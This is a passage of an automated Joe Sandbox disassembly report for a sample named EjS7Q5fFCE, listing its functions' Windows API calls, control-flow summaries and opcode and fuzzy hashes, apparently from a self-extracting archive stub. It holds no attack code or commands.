                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID: api-ms-
                                                              • API String ID: 3664257935-2084034818
                                                              • Opcode ID: 0812d3773edf7f196312f9c9334e7941e4ddf4e30d0e78cd6109de9d6678dba8
                                                              • Instruction ID: 2478fe459c469ba0fefb23dadfd92b9e1427d6272ddbdc400f9e55aafed7e43f
                                                              • Opcode Fuzzy Hash: 0812d3773edf7f196312f9c9334e7941e4ddf4e30d0e78cd6109de9d6678dba8
                                                              • Instruction Fuzzy Hash: 4411C432A04760ABEB228F589C4175A7764DF01BB2F210162F915EB291E768FE0086DD

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0043081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00430836
                                                                • Part of subcall function 0043081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0042F2D8,Crypt32.dll,00000000,0042F35C,?,?,0042F33E,?,?,?), ref: 00430858
                                                              • OleInitialize.OLE32(00000000), ref: 0043AC2F
                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0043AC66
                                                              • SHGetMalloc.SHELL32(00468438), ref: 0043AC70
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                              • String ID: riched20.dll$3Ro
                                                              • API String ID: 3498096277-3613677438
                                                              • Opcode ID: 2e37ad6eaa8b83f000b0abcf0d2a308b624fabd8ebefe9bbd14281b4505c0233
                                                              • Instruction ID: 3fb3786c4defffc53c8f45352850fa72eae62a32b8828ac6157201866b42d7e5
                                                              • Opcode Fuzzy Hash: 2e37ad6eaa8b83f000b0abcf0d2a308b624fabd8ebefe9bbd14281b4505c0233
                                                              • Instruction Fuzzy Hash: 4EF04FB1900209ABCB10AFAAD84999FFBFCEF84705F10412AA811E2241DBB85605CBA5

                                                              Control-flow Graph

                                                              • Basic blocks 4298e0-429a39. Internal calls: 43ec50, 426edb, 42bb03, 430602. API nodes: CreateFileW (42994b-42996a, 429990-4299b3), GetLastError (42996c-42998e, 429990-4299b3), SetFileTime (4299e5-4299f9). Graph image and executed/not-executed node colouring omitted.
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00427760,?,00000005,?,00000011), ref: 0042995F
                                                              • GetLastError.KERNEL32(?,?,00427760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0042996C
                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00427760,?,00000005,?), ref: 004299A2
                                                              • GetLastError.KERNEL32(?,?,00427760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004299AA
                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00427760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004299F9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: File$CreateErrorLast$Time
                                                              • String ID:
                                                              • API String ID: 1999340476-0
                                                              • Opcode ID: 041232061fe11bf3a252625f1603f6946f42e573a45f803fdf295d1bc7d7828e
                                                              • Instruction ID: 10b21fbd6b2904870b9f6aaaf818e06e70f311ccd8161e552f646b244454d495
                                                              • Opcode Fuzzy Hash: 041232061fe11bf3a252625f1603f6946f42e573a45f803fdf295d1bc7d7828e
                                                              • Instruction Fuzzy Hash: A93125B06443516FE7209F20DC46B9BBB94BB04330F500B1EF5A1923D1D7A8A994CB99

                                                              Control-flow Graph

                                                              • Basic blocks 43b568-43b5be. API nodes: PeekMessageW (43b568-43b581), GetMessageW (43b583-43b597), IsDialogMessageW (43b599-43b5a6), TranslateMessage and DispatchMessageW (43b5a8-43b5b6). Graph image and executed/not-executed node colouring omitted.
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0043B579
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0043B58A
                                                              • IsDialogMessageW.USER32(00010484,?), ref: 0043B59E
                                                              • TranslateMessage.USER32(?), ref: 0043B5AC
                                                              • DispatchMessageW.USER32(?), ref: 0043B5B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 1266772231-0
                                                              • Opcode ID: 1407d27a417dcd3a640c7865cbffb9cb9bb1a7cd48dabed988a6dc0df53d7092
                                                              • Instruction ID: 28f3efc95a013fc221e5cabc9a06ee1e7af391ed7f152caf5413b553603c5e21
                                                              • Opcode Fuzzy Hash: 1407d27a417dcd3a640c7865cbffb9cb9bb1a7cd48dabed988a6dc0df53d7092
                                                              • Instruction Fuzzy Hash: 1EF0BD71A0111ABBCB209FE5DC4CEDF7FACEE066957004929B505D2114EB78E605CBF9

                                                              Control-flow Graph

                                                              • Basic blocks 43abab-43ac01. Internal call: 431fbb. API nodes: GetClassNameW (43abab-43abca), SHAutoComplete (43abf6-43abf9), FindWindowExW (43abe3-43abef). Graph image and executed/not-executed node colouring omitted.
                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000050), ref: 0043ABC2
                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 0043ABF9
                                                                • Part of subcall function 00431FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0042C116,00000000,.exe,?,?,00000800,?,?,?,00438E3C), ref: 00431FD1
                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0043ABE9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                              • String ID: EDIT
                                                              • API String ID: 4243998846-3080729518
                                                              • Opcode ID: 09857b87a0e6830eca9c7fb0936122d7d3cb89af81f1b3ab33610ae8dcc1cf46
                                                              • Instruction ID: 3462e08c189bcaf71d89d7b1b13b3e6a8020cbed3c2f074984b912f46d998bd6
                                                              • Opcode Fuzzy Hash: 09857b87a0e6830eca9c7fb0936122d7d3cb89af81f1b3ab33610ae8dcc1cf46
                                                              • Instruction Fuzzy Hash: FFF0E232A0022876DB205A249C09F9FB26C9B4AF01F484026BE40A2184D768EA4186BE

                                                              Control-flow Graph

                                                              control_flow_graph 1073 43dbde-43dc09 call 43ec50 SetEnvironmentVariableW call 430371 1077 43dc0e-43dc12 1073->1077 1078 43dc36-43dc38 1077->1078 1079 43dc14-43dc18 1077->1079 1080 43dc21-43dc28 call 43048d 1079->1080 1083 43dc1a-43dc20 1080->1083 1084 43dc2a-43dc30 SetEnvironmentVariableW 1080->1084 1083->1080 1084->1078
                                                              APIs
                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0043DBF4
                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0043DC30
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentVariable
                                                              • String ID: sfxcmd$sfxpar
                                                              • API String ID: 1431749950-3493335439
                                                              • Opcode ID: 5cc4db1677d01e06d187212b6496febcc89063af488cca92d6fe160a80e51977
                                                              • Instruction ID: 58cdcd4195940788a771f473c528075faf1a2b71664450b501f27038e4024f95
                                                              • Opcode Fuzzy Hash: 5cc4db1677d01e06d187212b6496febcc89063af488cca92d6fe160a80e51977
                                                              • Instruction Fuzzy Hash: 5DF0EC72815724A7CB201FA69C06BFB3B58AF1CB87F042417BD8595152E6BCCD40D6BC

                                                              Control-flow Graph

                                                              control_flow_graph 1085 429785-429791 1086 429793-42979b GetStdHandle 1085->1086 1087 42979e-4297b5 ReadFile 1085->1087 1086->1087 1088 429811 1087->1088 1089 4297b7-4297c0 call 4298bc 1087->1089 1090 429814-429817 1088->1090 1093 4297c2-4297ca 1089->1093 1094 4297d9-4297dd 1089->1094 1093->1094 1097 4297cc 1093->1097 1095 4297ee-4297f2 1094->1095 1096 4297df-4297e8 GetLastError 1094->1096 1099 4297f4-4297fc 1095->1099 1100 42980c-42980f 1095->1100 1096->1095 1098 4297ea-4297ec 1096->1098 1101 4297cd-4297d7 call 429785 1097->1101 1098->1090 1099->1100 1103 4297fe-429807 GetLastError 1099->1103 1100->1090 1101->1090 1103->1100 1105 429809-42980a 1103->1105 1105->1101
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00429795
                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 004297AD
                                                              • GetLastError.KERNEL32 ref: 004297DF
                                                              • GetLastError.KERNEL32 ref: 004297FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FileHandleRead
                                                              • String ID:
                                                              • API String ID: 2244327787-0
                                                              • Opcode ID: 097a8d5a076bd0eae0a13ba031798b55f16f9cc6082e7875f0c06ef5d9c694c0
                                                              • Instruction ID: 7bbfe604cda5bc3189c63717388697a5a5a689af05ca368b78559069ec994a37
                                                              • Opcode Fuzzy Hash: 097a8d5a076bd0eae0a13ba031798b55f16f9cc6082e7875f0c06ef5d9c694c0
                                                              • Instruction Fuzzy Hash: 9611C630720324EBDF206F25E80466B37A9FB42765F94852BF416C6290D778CE44DB69
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00443F73,00000000,00000000,?,0044ACDB,00443F73,00000000,00000000,00000000,?,0044AED8,00000006,FlsSetValue), ref: 0044AD66
                                                              • GetLastError.KERNEL32(?,0044ACDB,00443F73,00000000,00000000,00000000,?,0044AED8,00000006,FlsSetValue,00457970,FlsSetValue,00000000,00000364,?,004498B7), ref: 0044AD72
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044ACDB,00443F73,00000000,00000000,00000000,?,0044AED8,00000006,FlsSetValue,00457970,FlsSetValue,00000000), ref: 0044AD80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              • Opcode ID: fdecc7c38fbd8ccbc7e925d558fdd505e36d25bccc8624c75eb3d90ddd08960b
                                                              • Instruction ID: 8474d4af21926402c80c46ddb2f8668014929d2f88f5a318d03eb86249da0190
                                                              • Opcode Fuzzy Hash: fdecc7c38fbd8ccbc7e925d558fdd505e36d25bccc8624c75eb3d90ddd08960b
                                                              • Instruction Fuzzy Hash: 66017B72A81732ABD7228F68DC44A577B5DEF44BB3B100635FC06D3691D728C811C6EA
                                                              APIs
                                                                • Part of subcall function 004497E5: GetLastError.KERNEL32(?,00461030,00444674,00461030,?,?,00443F73,00000050,?,00461030,00000200), ref: 004497E9
                                                                • Part of subcall function 004497E5: _free.LIBCMT ref: 0044981C
                                                                • Part of subcall function 004497E5: SetLastError.KERNEL32(00000000,?,00461030,00000200), ref: 0044985D
                                                                • Part of subcall function 004497E5: _abort.LIBCMT ref: 00449863
                                                                • Part of subcall function 0044BB4E: _abort.LIBCMT ref: 0044BB80
                                                                • Part of subcall function 0044BB4E: _free.LIBCMT ref: 0044BBB4
                                                                • Part of subcall function 0044B7BB: GetOEMCP.KERNEL32(00000000,?,?,0044BA44,?), ref: 0044B7E6
                                                              • _free.LIBCMT ref: 0044BA9F
                                                              • _free.LIBCMT ref: 0044BAD5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorLast_abort
                                                              • String ID: pE
                                                              • API String ID: 2991157371-674470523
                                                              • Opcode ID: 7aa745c41f0554564ee2975493b0f09762d2b2b7c2813418cde98e5a0c50866c
                                                              • Instruction ID: 18b1dd552472d31f7b1c18dfb63c93218935b3cbf349b58e6d01e74e8a2a6766
                                                              • Opcode Fuzzy Hash: 7aa745c41f0554564ee2975493b0f09762d2b2b7c2813418cde98e5a0c50866c
                                                              • Instruction Fuzzy Hash: 6F31D531904209AFEB10DFA9C441B5E77E5EF40324F21449FE904AB2A2EB39DD40DB98
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E51F
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: (C$PDu<C
                                                              • API String ID: 1269201914-1023926350
                                                              • Opcode ID: d1ae2edfa860f6f441456647e862314ee6900601afd7109b559ea82138852b94
                                                              • Instruction ID: a5a61257074aa01e0c1c163e1898d5db4f1f6f404a58b3c78b01702cdb42d1e7
                                                              • Opcode Fuzzy Hash: d1ae2edfa860f6f441456647e862314ee6900601afd7109b559ea82138852b94
                                                              • Instruction Fuzzy Hash: E7B012C165A140BC3108714B1D02D3F050CC0CAF1E730E42FF814C51C1E84D0D46193E
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E51F
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: 2C$PDu<C
                                                              • API String ID: 1269201914-410691178
                                                              • Opcode ID: 90014e47a81da887f135490a6d5de26502362cbf61248a8ed920a75db5f66fa6
                                                              • Instruction ID: 2f4dfb73aac2e43445e1b170e1ad40acda20ee17d0506836baa5bd5545c8feaf
                                                              • Opcode Fuzzy Hash: 90014e47a81da887f135490a6d5de26502362cbf61248a8ed920a75db5f66fa6
                                                              • Instruction Fuzzy Hash: 1BB012C165A100BD3108714B1C02E3F010CC0CAF1E730A42FF814C10C1E84C0D45193E
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0042D343,00000001,?,?,?,00000000,0043551D,?,?,?), ref: 00429F9E
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0043551D,?,?,?,?,?,00434FC7,?), ref: 00429FE5
                                                              • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0042D343,00000001,?,?), ref: 0042A011
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$Handle
                                                              • String ID:
                                                              • API String ID: 4209713984-0
                                                              • Opcode ID: dec760a852f27d62ff42dd9f8aa65a7f8eb0650c180a851bc50f330a431c990d
                                                              • Instruction ID: 808cc98f88d3d8a942bfc9087e21e35bf917304ce6bf90864d6fb2a1b72ad7c9
                                                              • Opcode Fuzzy Hash: dec760a852f27d62ff42dd9f8aa65a7f8eb0650c180a851bc50f330a431c990d
                                                              • Instruction Fuzzy Hash: 0E31D031304325AFDB14CF20E918B6FB7A5EF84715F44491EF94197290CB79AD48CBAA
                                                              APIs
                                                                • Part of subcall function 0042C27E: _wcslen.LIBCMT ref: 0042C284
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0042A175,?,00000001,00000000,?,?), ref: 0042A2D9
                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0042A175,?,00000001,00000000,?,?), ref: 0042A30C
                                                              • GetLastError.KERNEL32(?,?,?,?,0042A175,?,00000001,00000000,?,?), ref: 0042A329
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                                              • String ID:
                                                              • API String ID: 2260680371-0
                                                              • Opcode ID: a0bd6bb9f1de0d6b0a8c731950d6d5ecd1a8ee8593aa474097e0a6574744677c
                                                              • Instruction ID: c89928c6294c205f01d388a18e52b564cccdce12b8856c18b3b16b5ba6ad30d4
                                                              • Opcode Fuzzy Hash: a0bd6bb9f1de0d6b0a8c731950d6d5ecd1a8ee8593aa474097e0a6574744677c
                                                              • Instruction Fuzzy Hash: FA0196217003309BDF21EB766D49BAE27489F09789F84445AFD01E6281DB5CDE91C6BE
                                                              APIs
                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044B8B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Info
                                                              • String ID:
                                                              • API String ID: 1807457897-3916222277
                                                              • Opcode ID: 767a73fdd4dcb3bab941fee4ae223c5a8da38ca09bba976a08d73bf022088022
                                                              • Instruction ID: 799cb24f0cd39ef476cd4e3d1d49731f8a03ee996d47d5febe1750d0127f9e01
                                                              • Opcode Fuzzy Hash: 767a73fdd4dcb3bab941fee4ae223c5a8da38ca09bba976a08d73bf022088022
                                                              • Instruction Fuzzy Hash: 2A41FCB050438C9EEB218E258C84BF6BBB9DB55304F1404EED5DA86242D339EA45DFA5
                                                              APIs
                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0044AFDD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: String
                                                              • String ID: LCMapStringEx
                                                              • API String ID: 2568140703-3893581201
